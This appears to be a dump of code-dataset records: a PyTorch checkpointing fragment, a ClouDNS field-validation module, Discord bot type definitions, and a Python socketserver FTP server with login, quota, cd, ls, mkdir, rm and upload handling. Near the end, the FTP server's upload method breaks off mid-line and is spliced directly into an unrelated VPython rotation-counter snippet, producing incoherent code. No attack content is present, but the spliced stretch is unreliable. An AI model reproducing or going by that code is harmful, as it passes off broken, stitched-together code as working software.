iter_idx % opt.CHECKPOINT_INTERVAL == 0 and iter_idx != 0:\n if not os.path.exists('./{}'.format(opt.pth_path)):\n os.makedirs('./{}'.format(opt.pth_path))\n save_path = './{}/mfh_baseline_glove_iter'.format(opt.pth_path) + str(iter_idx) + '.pth'\n torch.save(model.state_dict(), save_path)\n \n \n \n\n","sub_path":"mfh_baseline.py","file_name":"mfh_baseline.py","file_ext":"py","file_size_in_byte":12262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357532009","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# name: validation.py\n# author: Harold Bradley III\n# email: harold@bradleystudio.net\n# created on: 09/16/2018\n#\n\n\"\"\"\nclouddns.validation\n~~~~~~~~~~~~~~~~~~~\n\nThis module contains functions to validate fields passed into the API.\n\"\"\"\n\nimport re\n\n\nclass ValidationError(Exception):\n \"\"\"Exception thrown when a validation error has occured.\"\"\"\n def __init__(self, fieldname, message, *args, **kwargs):\n \"\"\"Initialize ValidationError with `fieldname` and `message` values.\"\"\"\n self.details = {\n 'fieldname': fieldname,\n 'message': message,\n }\n super(ValidationError, self).__init__(message, *args, **kwargs)\n\n def get_details(self):\n \"\"\"Returns a list of error details.\"\"\"\n return [self.details]\n\n\nclass ValidationErrorsBatch(ValidationError):\n \"\"\"Exception thrown when 
multiple validation errors have occured.\"\"\"\n def __init__(self, validation_errors, *args, **kwargs):\n \"\"\"Initialize ValidationError with `validation_errors` list.\"\"\"\n self.validation_errors = validation_errors\n super(ValidationError, self).__init__('Validation errors occured.', *args, **kwargs)\n\n def get_details(self):\n \"\"\"Returns a list of error details.\"\"\"\n return [error.details for error in self.validation_errors]\n\n\n# Global value: Only use this in check_for_validation_errors and validate.\n_batched_validation_errors = []\n\n\ndef check_for_validation_errors():\n \"\"\"Checks for batched validation errors and raises a ValidationErrorsBatch\n if any are found. Otherwise, does nothing.\"\"\"\n global _batched_validation_errors\n if len(_batched_validation_errors) > 0:\n raise ValidationErrorsBatch(_batched_validation_errors)\n\n\ndef validate(value, fieldname, *args, **kwargs):\n \"\"\"Validates a value for a particular fieldtype.\n Returns a value if it is valid; raises an error otherwise.\n\n :param value: mixed, the value to validate\n :param fieldname: string, the fieldname to validate (determines the type of\n validation to use)\n :param optional: bool, (kwarg) if True, accept None as a valid value\n :param batch: bool, (kwarg) if True, batches errors for later processing\n \"\"\"\n try:\n if kwargs.get('optional', False) and not value:\n return value\n elif not value:\n raise ValidationError(fieldname, 'This field is required.')\n\n if fieldname not in validation_functions:\n return value\n\n if validation_functions[fieldname](value, fieldname, *args, **kwargs):\n return value\n\n # If for some reason the validation fails, but no error was raised,\n # raise one here. This should hopefully never happen\n raise ValidationException('Unexpected validation error.')\n\n except ValidationError as e:\n if kwargs.get('batch', False):\n global _batched_validation_errors\n _batched_validation_errors.append(e)\n else:\n raise e\n\n\ndef batch_validate(value, fieldname, *args, **kwargs):\n \"\"\"Helpful wrapper around validate with batch flag set to True.\"\"\"\n return validate(value, fieldname, *args, batch = True, **kwargs)\n\n\ndef is_int(value, fieldname, min_value = None, max_value = None, **kwargs):\n \"\"\"Returns the value if value is an integer (within min_value/max_value\n range); otherwise, raises a validation error.\"\"\"\n try:\n value += 0 # Try it to see if it is an integer\n except TypeError:\n raise ValidationError(fieldname, 'This field must be an integer.')\n\n if min_value and value < min_value:\n raise ValidationError(fieldname,\n 'This field must be greater than ' + str(min_value) + '.')\n if max_value and value > max_value:\n raise ValidationError(fieldname,\n 'This field must be less than ' + str(max_value) + '.')\n return True\n\n\ndef is_domain_name(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain name. Otherwise, raises a\n validation error.\"\"\"\n if not re.match('^((?=[a-z0-9-]{1,63}\\.)(xn--)?[a-z0-9]+(-[a-z0-9]+)*\\.)+[a-z]{2,63}$',\n value):\n raise ValidationError(fieldname,\n 'This field must be a valid domain name.')\n return True\n\n\ndef is_email(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain name. 
Otherwise, raises a\n validation error.\"\"\"\n if not re.match('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)',\n value):\n raise ValidationError(fieldname,\n 'This field must be a valid email.')\n return True\n\n\ndef is_record_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain recordy type. Otherwise,\n raises a validation error.\"\"\"\n try:\n if value.upper() not in RECORD_TYPES:\n raise ValidationError(fieldname,\n 'This field must be a valid domain record type.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n raise ValidationError(fieldname,\n 'This field must be a valid domain record type.')\n return True\n\nRECORD_TYPES = ['A', 'AAAA', 'MX', 'CNAME', 'TXT', 'NS', 'SRV', 'WR',\n 'RP', 'SSHFP', 'ALIAS', 'CAA', 'PTR' ]\n\n\ndef is_ttl(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid ClouDNS ttl. Otherwise, raises a\n validation error.\"\"\"\n try:\n if value.lower() not in TTL_STRINGS:\n raise ValidationError(fieldname,\n 'This field must be a valid ttl. ' + \\\n '(1 minute, 5 minutes, 15 minutes, ' + \\\n '30 minutes, 1 hour, 6 hours, 12 hours, ' + \\\n '1 day, 2 days, 3 days, 1 week, 2 weeks, ' + \\\n 'or 1 month)')\n # If value isn't a string, lower() raises AttributeError\n except AttributeError:\n if value not in TTLS:\n raise ValidationError(fieldname,\n 'This field must be a valid ttl. ' + \\\n '(60, 300, 900, 1800, 3600, 21600, ' + \\\n '43200, 86400, 172800, 259200, 604800, ' + \\\n '1209600, or 2592000)')\n return True\n\nTTL_STRINGS = ['1 minute', '5 minutes', '15 minutes', '30 minutes', '1 hour',\n '6 hours', '12 hours', '1 day', '2 days', '3 days', '1 week',\n '2 weeks', '1 month']\n\nTTLS = [60, 300, 900, 1800, 3600, 21600, 43200, 86400, 172800, 259200, 604800,\n 1209600, 2592000]\n\n\ndef is_redirect_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is 301 or 302. Otherwise, raises a validation\n error.\"\"\"\n if value != 301 and value != 302:\n raise ValidationError(fieldname,\n 'This field must be 301 (permanent) or 302 (temporary).')\n return True\n\n\ndef is_algorithm(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is a proper algorithm. Otherwise, raises a\n validation error.\"\"\"\n try:\n if value.upper() not in ALGORITHMS:\n raise ValidationError(fieldname,\n 'This field must be RSA, DSA, ECDSA, or Ed25519.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n if value not in [1, 2, 3, 4]:\n raise ValidationError(fieldname,\n 'This field must be RSA, DSA, ECDSA, or Ed25519.')\n return True\n\nALGORITHMS = ['RSA', 'DSA', 'ECDSA', 'ED25519']\n\n\ndef is_fptype(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is a proper fingerprint type. Otherwise, raises\n a validation error.\"\"\"\n try:\n if value.upper() not in FP_TYPES:\n raise ValidationError(fieldname,\n 'This field must be one of SHA-1 or SHA-256.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n if value not in [1, 2]:\n raise ValidationError(fieldname,\n 'This field must be one of SHA-1 or SHA-256.')\n return True\n\nFP_TYPES = ['SHA-1', 'SHA-256']\n\n\ndef is_caa_flag(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is 0 or 128. 
Otherwise, raises a validation\n error.\"\"\"\n if value != 0 and value != 128:\n raise ValidationError(fieldname,\n 'This field must be 0 (non-critical) or 128 (critical).')\n return True\n\n\ndef is_caa_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a caa type. Otherwise, raises a validation\n error.\"\"\"\n try:\n if value.lower() not in CAA_TYPES:\n raise ValidationError(fieldname,\n 'This field must be one of issue, issuewild, iodef.')\n # If value isn't a string, lower() raises AttributeError\n except AttributeError:\n raise ValidationError(fieldname,\n 'This field must be one of issue, issuewild, iodef.')\n return True\n\nCAA_TYPES = ['issue', 'issuewild', 'iodef']\n\n\ndef is_required(value, fieldname, **kwargs):\n \"\"\"Returns the value if there is some value provided. Otherwise, raises a\n validation error.\"\"\"\n if not value:\n raise ValidationError(fieldname,\n 'This field is required.')\n return True\n\n\ndef is_api_bool(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a 0 or 1. Otherwise, raises a validation\n error.\"\"\"\n if value != 0 and value != 1:\n raise ValidationError(fieldname,\n 'This field must be 0 or 1.')\n return True\n\n\ndef is_valid(value, fieldname, **kwargs):\n \"\"\"Returns the value assuming it's valid.\"\"\"\n return True\n\n\n# Set up validation functions dict\nvalidation_functions = {\n 'admin-mail': is_email,\n 'algorithm': is_algorithm,\n 'bool': is_api_bool,\n 'caa_flag': is_caa_flag,\n 'caa_type': is_caa_type,\n 'caa_value': is_valid,\n 'default-ttl': is_int,\n 'domain-name': is_domain_name,\n 'email': is_email,\n 'fptype': is_fptype,\n 'frame': is_api_bool,\n 'frame-title': is_valid,\n 'geodns-location': is_int,\n 'integer': is_int,\n 'mail': is_email,\n 'port': is_int,\n 'primary-ns': is_domain_name,\n 'priority': is_int,\n 'record': is_required,\n 'redirect-type': is_redirect_type,\n 'refresh': is_int,\n 'required': is_required,\n 'save-path': is_api_bool,\n 'status': is_api_bool,\n 'ttl': is_ttl,\n 'txt': is_domain_name,\n 'type': is_record_type,\n 'weight': is_int,\n}\n","sub_path":"cloudns_api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"382392330","text":"#!/usr/bin/env python3\n\nimport enum\nfrom typing import Generic, Optional, TypeVar\n\n\nT = TypeVar(\"T\")\n\n\nclass GreedyStr(str):\n \"\"\"\n Special type designation for a string which should consume the rest\n of the arguments when parsing a command. Uses type hinting for some\n weird reflection stuff that kind of feels hacky and sketchy.\n \"\"\"\n\n\nclass BotParam(Generic[T]):\n \"\"\"\n Special type designation for a type which should be kept *secret* from\n usage helptext. 
This is useful for bot-only arguments such as changing\n the actor to be the bot itself instead of the original message sender.\n \"\"\"\n\n\nclass Status(enum.Enum):\n Success = 1\n Failure = 2\n Invalid = 3\n\n\nclass HandlerStatus:\n def __init__(self, status: Status, msg: Optional[str] = None) -> None:\n self.status = status\n self.msg = msg or \"\"\n\n\nclass SetMessageSubcommand(enum.Enum):\n WIN = 1\n LOSE = 2\n\n @classmethod\n def from_str(cls, s: str) -> \"SetMessageSubcommand\":\n if s.strip().lower() == \"win\":\n return SetMessageSubcommand.WIN\n elif s.strip().lower() == \"lose\":\n return SetMessageSubcommand.LOSE\n else:\n raise ValueError(f\"Could not parse {s} as SetMessageSubcommand\")\n\n\nclass Rename(enum.Enum):\n SERVER = 1\n TEXT_CHAT = 2\n\n\nclass Time:\n def __init__(self, s: str) -> None:\n self.s = s\n\n def __str__(self) -> str:\n return f\"{self.s} ({self.seconds} seconds)\"\n\n def __repr__(self) -> str:\n return str(self)\n\n @property\n def seconds(self) -> int:\n units = {}\n units[\"s\"] = 1\n units[\"m\"] = units[\"s\"] * 60\n units[\"h\"] = units[\"m\"] * 60\n units[\"d\"] = units[\"h\"] * 24\n units[\"y\"] = units[\"d\"] * 365\n\n seconds = 0\n idx = 0\n while idx < len(self.s):\n builder = 0\n # Get value\n while idx < len(self.s) and self.s[idx].isdigit():\n builder = builder * 10 + int(self.s[idx])\n idx += 1\n # Now get unit\n unit_value = units[self.s[idx]]\n # Consume until end of units or string\n while idx < len(self.s) and not self.s[idx].isdigit():\n idx += 1\n # Add to total\n seconds += builder * unit_value\n return seconds\n\n\nclass DiscordUser:\n def __init__(self, discord_id: int) -> None:\n self.id = discord_id\n\n def __str__(self) -> str:\n return str(self.id)\n\n def __repr__(self) -> str:\n return str(self)\n\n @classmethod\n def from_str(cls, s: str) -> \"DiscordUser\":\n if len(s) > 0 and s[0] == \"<\" and s[-1] == \">\":\n s = s[1:-1]\n if len(s) > 0 and s[0:2] == \"@!\":\n s = s[2:]\n elif len(s) > 0 and s[0] == \"@\":\n # Sometimes there's a leading @ but no ! 
-- I don't know why\n s = s[1:]\n return DiscordUser(int(s))\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"517407963","text":"import os\nimport sys\nimport json\nimport time\nimport timer\nimport shutil\nimport hashlib\nimport logging\nimport socketserver\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(base_dir)\n\nfrom core.record import record\nfrom data.conf.configure import HomeDocs, username, password\nfrom data.dict.dict import Stand_msg\n\n'''\n# 拼接文件日志,格式为 %Y-%m-%d.txt\n'''\ntimer = time.strftime(\"%Y-%m-%d\")\nlogger = record(base_dir + \"\\\\data\\\\log\\\\\" + timer + \".txt\")\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n '''\n # 解析连接请求参数\n '''\n def setup(self):\n auth_msg_source = self.request.recv(1024).strip()\n self.auth_msg = json.loads(auth_msg_source)\n if(self.auth_msg.get('type')) == 'auth':\n self.username = self.auth_msg['username']\n self.md5_password = self.auth_msg['password']\n self.ipaddr = self.auth_msg['ipaddr']\n self.role = self.auth_msg['auth_tag']\n logger.info(\"用户名: %s尝试从终端 %s 登录服务器\"%(self.username, self.ipaddr))\n\n '''\n # 处理连接\n '''\n def handle(self):\n if self.auth_msg.get('type') == 'auth':\n auth_tag = self.__auth()\n if auth_tag==101:\n logger.info(\"用户 %s 从终端 %s 登录成功!\"%(self.username,self.ipaddr))\n #此处定义的是当前登录用户的目标文件夹,此处也是函数self.dest初始化的位置\n self.dest=HomeDocs+\"\\\\\"+self.username\n ##########此处执行的动作是创建以用户名命名的文件夹,防止后续操作出现问题###############\n dirs=self.dest.split(\"\\\\\")\n res_item=\"\"\n for item in dirs:\n res_item=res_item+item+\"\\\\\"\n if os.path.exists(res_item):\n pass\n else:\n os.mkdir(res_item)\n ###################读取当前用户的空间使用值#############################################\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_qtread:\n for qt in f_qtread:\n qtusr,qtvl=qt.strip(\"\\n\").strip('\"').split(\":\")\n if qtusr==self.username:\n self.qtvl=qtvl\n self.qtvl=int(self.qtvl)*1024*1024\n break\n ####################读取当前用户名下的文件大小###########################################\n self.allsize=0\n for size_path,size_dirs,size_files in os.walk(HomeDocs+\"\\\\\"+self.username):\n for item in size_files:\n self.allsize=self.allsize+int(os.path.getsize(os.path.join(size_path,item)))\n self.__changemsg()\n elif auth_tag==102:\n logger.error(\"用户名 %s 未注册。\"%self.username)\n elif auth_tag==100:\n logger.error(\"用户登录失败,用户名或密码发送错误。\")\n\n '''\n # 服务端用户加密认证\n '''\n def __auth(self):\n if self.role == 'ordinary': # 普通用户身份登录\n auth_tag=False\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_read:\n for line in f_read:\n usr,pad=line.strip('\\n').strip('\"').split(\":\")\n if usr==self.username and pad ==self.md5_password:\n auth_tag=True\n self.__sendmsg(101)\n return 101\n if auth_tag==False:\n self.__sendmsg(100)\n return 100\n else:\n self.__sendmsg(102)\n return 102\n elif self.role == 'mgr': # 管理员身份登录\n m = hashlib.md5(password.encode('utf-8'))\n passwd_value = m.hexdigest()\n if self.username == username and self.md5_password == passwd_value:\n self.__sendmsg(101, data = 'True')\n logger.info(\"用户 %s 从终端 %s 登录成功!\" % (self.username, self.ipaddr))\n try:\n self.__mgr()\n except:\n logger.info(\"%s的管理员已断开连接。\" % self.ipaddr)\n else:\n self.__sendmsg(100)\n\n '''\n # 发送处理结果给请求端\n '''\n def __sendmsg(self, stand_code, data=None):\n sendmsg 
= {\n 'standcode':stand_code,\n 'standmsg':Stand_msg[stand_code],\n 'data':data\n }\n self.request.send(json.dumps(sendmsg).encode())\n\n '''\n # 此为管理员相关功能的函数,不涉及FTP自身的功能\n '''\n def __mgr(self):\n '''\n 此为管理员相关功能的函数,不涉及FTP自身的功能\n :return:\n '''\n while True:\n msg='''\n 1.注册用户\n 2.删除用户\n 3.查看用户\n 4.修改配额\n 5.退出\n '''\n self.__sendmsg(102,data=msg)\n ret_msg=self.__recvmsg()\n if ret_msg==\"1\" or ret_msg==\"注册用户\":\n\n wr_tag=False\n self.__sendmsg(400)#此处是为了让客户端知道下一步应该做什么,发送400 是为了让客户端进入到注册用户的界面\n sign_msg=self.__recvmsg()\n username=sign_msg.get(\"username\")\n password=sign_msg.get(\"password\")\n quotavalue=sign_msg.get(\"quotavalue\")\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_read:\n for line in f_read:\n usr,pad=line.strip('\"').split(\":\")\n if usr==username:\n wr_tag=True\n if wr_tag==False:\n joindir=\"\"\n #此处是为了预防初次操作不存在当前目录#####################\n dirs=(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\").split(\"\\\\\")\n for i in range(0,len(dirs)):\n if len(dirs)==i+1:\n break\n joindir=joindir+dirs[i]+\"\\\\\"\n if os.path.exists(joindir):\n continue\n else:\n os.mkdir(joindir)\n #############################################################\n #将用户名密码写入userauth.txt文件\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"a\") as f:\n f.write(json.dumps(str(username)+\":\"+str(password)))\n f.write(\"\\n\")\n #将配额值写入配额文件\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"a\") as f_quota:\n f_quota.write(json.dumps(str(username)+\":\"+str(quotavalue)))\n f_quota.write(\"\\n\")\n logging.info(\"管理员注册账号成功,账号名:%s,用户默认空间限额:%s\"%(username,quotavalue))\n self.__sendmsg(403)#成功\n else:#此处失败主要是因为存在相同的用户名\n logging.error(\"管理员注册账号失败,账号名:%s\"%username)\n self.__sendmsg(404)#失败\n continue\n elif ret_msg==\"2\" or ret_msg==\"删除用户\":\n user_list=[]#删除用户名使用的列表\n quota_list=[]#删除配额使用的列表\n del_tag=False#表示是否需要删除用户的tag\n quota_tag=False#表示是否需要删除配额值的tag\n self.__sendmsg(405)\n del_username=self.__recvmsg()#接收需要删除的用户名\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_delete:\n #判断是否需要进行删除动作,若需要删除,则del_tag为True\n for line in f_delete:\n delusr,delpad=line.strip('\"').split(\":\")\n if delusr==del_username:\n del_tag=True\n continue\n else:\n user_list.append(line)\n #判断配额值是否需要删除,若需要删除,则quota_tag为True\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_delquota:\n for line2 in f_delquota:\n delusr,delquo=line2.strip('\"').split(\":\")\n if delusr==del_username:\n quota_tag=True\n continue\n else:\n quota_list.append(line2)\n if del_tag and quota_tag:\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"w\") as f_rewr:\n for item in user_list:\n f_rewr.write(item)\n logging.info(\"完成删除用户%s\"%delusr)\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"w\") as f_requota:\n for item in quota_list:\n f_requota.write(item)\n logging.info(\"完成删除用户%s磁盘配额\"%delusr)\n self.__sendmsg(401)\n elif quota_tag==False:\n logger.info(\"删除用户%s磁盘配额失败\"%delusr)\n self.__sendmsg(408)\n else:\n logger.error(\"删除用户%s失败,当前用户未注册\"%delusr)\n self.__sendmsg(402)\n else:\n logger.info(\"删除用户%s失败,当前用户文件不存在\"%del_username)\n self.__sendmsg(413)\n elif ret_msg==\"3\" or ret_msg==\"查看用户\":\n seek_list=[]\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_seek:\n 
#此处发送给客户端的信息主要是配额文件内的信息\n #格式为: 用户名:配额值\n for line in f_seek:\n seek_list.append(line)\n self.__sendmsg(407,data=seek_list)\n\n else:\n self.__sendmsg(407)\n logging.info(\"管理员查询了用户信息\")\n elif ret_msg==\"4\" or ret_msg==\"修改配额\":\n self.__sendmsg(410)\n quota_msg=self.__recvmsg()\n cgqt_list=[]\n qt_value=False\n quota_name=quota_msg.get(\"name\")\n cgqt_value=quota_msg.get(\"value\")\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_cgvalue:\n for line in f_cgvalue:\n qtname,qtvalue=line.strip(\"\\n\").strip('\"').split(\":\")\n if qtname==quota_name:\n qt_value=True\n qtline=str(qtname)+\":\"+str(cgqt_value)\n cgqt_list.append(qtline)\n continue\n else:\n cgqt_list.append(line.strip(\"\\n\").strip('\"'))\n if qt_value:\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"w\") as f_cgvalue_write:\n for i in range(0,len(cgqt_list)):\n f_cgvalue_write.write('\"'+cgqt_list[i]+'\"')\n f_cgvalue_write.write(\"\\n\")\n self.__sendmsg(411)\n logger.info(\"管理员修改了用户%s的配额值!\"%quota_name)\n else:\n self.__sendmsg(412)\n logger.info(\"修改配额值失败,当前要修改的用户%s不存在\"%quota_name)\n else:\n self.__sendmsg(412)\n logger.info(\"修改配额值失败,当前配额文件不存在\")\n elif ret_msg==\"5\" or ret_msg==\"退出\":\n self.__sendmsg(406)\n logger.info(\"管理员已退出\")\n\n else:\n #103没有特殊含义,仅仅是因为其未分配提示词\n self.__sendmsg(103)\n continue\n #结束连接时\n def finish(self):\n logger.info(\"%s与服务器连接结束。\"%self.ipaddr)\n logger.info(\"=============================================================\")\n\n '''\n # 服务端接受客户端发送过来数据的\n '''\n def __recvmsg(self):\n Rsg_source=self.request.recv(1024)\n Rsg=json.loads(Rsg_source.decode())\n return Rsg\n\n\n def __changemsg(self):\n '''\n 此函数为登录成功后客户端与服务器相互交互的函数,客户端发送相关指令给服务器,服务器根据指令分配相应函数完成。\n :return:\n '''\n while True:\n try:\n self.chmsg=self.__recvmsg()\n if self.chmsg.get(\"Type\")==\"pwd\":\n #运行pwd函数\n self.__pwd()\n elif self.chmsg.get(\"Type\")==\"cd\":\n self.__cd()\n elif self.chmsg.get(\"Type\")==\"ls\":\n self.__ls()\n elif self.chmsg.get(\"Type\")==\"put\":\n self.__put()\n elif self.chmsg.get(\"Type\")==\"get\":\n self.__get()\n elif self.chmsg.get(\"Type\")==\"mkdir\":\n self.__mkdir()\n elif self.chmsg.get(\"Type\")==\"rm\":\n self.__rm()\n elif self.chmsg.get(\"Type\")==\"bye\":\n self.__bye()\n else:\n self.__help()\n except:\n logger.info(\"客户端%s已断开连接\"%self.ipaddr)\n break\n\n def __ls(self):\n '''\n #此处为遍历当前目录下所有的文件夹和文件,然后返回。\n #若当前目录为空,则不会返回data数据,客户端可据此进行判断“当前目录为空”\n :return:\n '''\n ls_send_list=[]\n if self.chmsg.get(\"Type\") is not None:\n ls_send_list=self.__walk()\n logger.info(\"用户%s遍历了目录,目录名为%s\"%(self.username,self.dest.strip(\"\").split(\"\\\\\")[-1]))\n self.__sendmsg(103,data=ls_send_list)\n\n def __walk(self):\n '''\n #此处遍历当前目录,找出所在文件夹的子文件夹和文件列表,并返回相应的列表,格式为 [[文件夹列表],[文件列表]]\n :return: 返回的是当前文件夹下存在的文件夹名和文件名的列表\n '''\n c=0\n search_list=[]\n ls_list=os.walk(self.dest)\n for item in ls_list:\n for item2 in item:\n if c==0:\n c+=1\n continue\n search_list.append(item2)\n if c==1:\n break\n return search_list\n\n def __cd(self):\n '''\n #执行目录切换动作的函数\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n dest=self.chmsg[\"dest\"]\n #将全局的self.dest赋值到本函数内的this_dest,确保调用。\n this_dest=self.dest\n # this_tag=False\n #此处只是获取search_walk返回的文件夹列表##\n floder_list=(self.__walk())#[0]\n file_list=floder_list[0]\n ###########################################\n if dest in file_list:\n self.dest=this_dest+\"\\\\\"+dest\n self.__sendmsg(109)\n logger.info(\"用户%s已将目录切换至%s\"%(self.username,self.dest))\n 
#a \"..\" destination switches to the parent directory.\n #check whether the switch would exceed the user's permission; if it would, keep the current directory — the highest reachable level is the folder named after the user.\n elif dest==\"..\":\n #if the switch would escape the sandbox, keep the current directory\n if self.dest==HomeDocs+\"\\\\\"+self.username+\"\\\\\" or self.username not in self.dest.split(\"\\\\\"):\n self.dest=HomeDocs+\"\\\\\"+self.username\n logger.error(\"User %s asked to switch outside the permitted tree; the switch was refused.\"%self.username)\n self.__sendmsg(111)\n #otherwise perform the switch: split the path and drop its last component.\n # elif HomeDocs+\"\\\\\"+self.username in self.dest:\n else:\n dest_list=self.dest.split(\"\\\\\")\n new_dest=\"\"\n for i in range(0,len(dest_list)):\n if len(dest_list)==i+1:\n break\n new_dest=new_dest+dest_list[i]+\"\\\\\"\n #after the switch, write the changed path back to the global self.dest so every cooperating method sees it\n self.dest=new_dest.strip(\"\\\\\")\n logger.info(\"User %s moved up one level to %s\"%(self.username,self.dest))\n self.__sendmsg(110)\n else:\n logger.error(\"User %s failed to switch to %s: no such directory on the server\"%(self.username,dest))\n self.__sendmsg(108)\n\n def __pwd(self):\n '''\n #Reports the user's current location\n :return:\n '''\n send_list=\"\"\n send_tag=False\n if self.chmsg.get(\"Type\") is not None:\n dest_list=self.dest.split(\"\\\\\")\n for item in dest_list:\n if item!=\"\":\n if item==self.username:\n send_tag=True\n if send_tag==True:\n send_list=send_list+item+\"\\\\\"\n logger.info(\"User %s queried the current directory: %s\"%(self.username,send_list))\n self.__sendmsg(103,data=send_list)\n\n\n def __mkdir(self):\n '''\n #Creates a directory\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n mkname=self.chmsg.get(\"mkname\")\n if os.path.exists(self.dest+\"\\\\\"+mkname):\n logger.error(\"The directory to create already exists; creation refused\")\n self.__sendmsg(112)\n else:\n #while creating the directory, also create any intermediate directories missing along the path.\n dirs=self.dest.split(\"\\\\\")\n dirs.append(mkname)\n res_item=\"\"\n for item in dirs:\n res_item=res_item+item+\"\\\\\"\n if os.path.exists(res_item):\n pass\n else:\n os.mkdir(res_item)\n self.__sendmsg(113)\n logger.info(\"User %s created folder %s\"%(self.username,self.chmsg.get(\"mkname\")))\n\n\n def __rm(self):\n '''\n #Removes a file or a folder.\n #The code must tell folders and files apart: the first pass of the loop handles folders, the second pass handles files.\n #When a folder still contains files, os.rmdir() cannot remove it and raises an error;\n #shutil.rmtree removes everything in one go.\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n c=0\n tag=False\n rmname=self.chmsg.get(\"rmname\")\n file_list=self.__walk()\n for item in file_list:\n if rmname in item and c==0:\n if os.path.exists(self.dest+\"\\\\\"+rmname):\n try:\n shutil.rmtree(self.dest+\"\\\\\"+rmname)\n logger.info(\"Folder %s was deleted by user %s\"%(rmname,self.username))\n self.__sendmsg(114)\n except:\n logger.error(\"Error while deleting folder %s\"%rmname)\n self.__sendmsg(118)\n else:\n logger.error(\"The folder to delete does not exist; nothing removed\")\n self.__sendmsg(115)\n tag=True\n #on the first pass c=0 keeps this branch unreachable; it is only entered on the second pass\n elif rmname in item and c==1:\n if os.path.isfile(self.dest+\"\\\\\"+rmname):\n try:\n os.remove(self.dest+\"\\\\\"+rmname)\n self.__sendmsg(116)\n logger.info(\"File %s was deleted by user %s\"%(rmname,self.username))\n except:\n logger.error(\"Error while deleting file %s\"%rmname)\n self.__sendmsg(118)\n else:\n logger.error(\"The file to delete does not exist; nothing removed\")\n self.__sendmsg(117)\n tag=True\n c+=1\n if tag==False:\n logger.error(\"The file to delete does not exist; nothing removed\")\n self.__sendmsg(117)\n #################after the deletion, recompute the total size of the user's directory####################\n self.allsize=0\n for size_path,size_dirs,size_files in os.walk(HomeDocs+\"\\\\\"+self.username):\n for item in size_files:\n self.allsize=self.allsize+int(os.path.getsize(os.path.join(size_path,item)))\n ########################################################################################\n\n def __put(self):\n '''\n ##Handles the upload action#\n :return:\n '''\n recv_len=0#number of bytes received so far\n 
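#The client is expected to have sent upload metadata of the form\n #{\"Type\": \"put\", \"filename\": ..., \"size\": ..., \"md5\": ...} (these keys are read below).\n 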
tag=False#tag marks whether the next step is needed: if the file name already exists on the server, a fresh upload is not accepted.\n filename=self.chmsg[\"filename\"]#file name sent by the client\n if \"\\\\\" in filename:#if the name carries a path, split the string and keep only the last component.\n filename=(filename.split(\"\\\\\"))[-1]\n size=self.chmsg[\"size\"]#file size sent by the client\n md5=self.chmsg[\"md5\"]#md5 digest sent by the client\n exist_list=self.__walk()\n #md5 computation\n file_md5 = hashlib.md5()\n ##################\n for existname in exist_list:\n if len(existname)!=0:\n if filename in existname:\n tag=True#tag True means the file already exists; transferring it anyway would require comparing md5 digests.\n ########################add the size of the incoming file to the size already in use###########\n self.allsize=int(self.allsize)+int(size)\n #if the existing files plus the upload stay within the quota, start accepting the transfer.\n if self.qtvl>=self.allsize:\n #if tag is False the server has no such file yet, so it is handled as a new file.\n if tag==False:\n #the server tells the client to keep sending.\n self.__sendmsg(102,data=\"continue\")\n filename_stream=open(self.dest+\"\\\\\"+filename,\"wb\")\n while True:\n ############receive the transferred data in a loop##################\n try:\n if recv_len= 399.8:\r\n rotations += 1\r\n\r\n #Update variable outputs\r\n time.text = \"Time: %1.f\" % t + \" seconds\"\r\n nmrRotations.text = \"Rotation: %1.f\" % rotations\r\n ballPosX.text = \"Ball.pos.x: %1.f\" % ball.pos.x\r\n 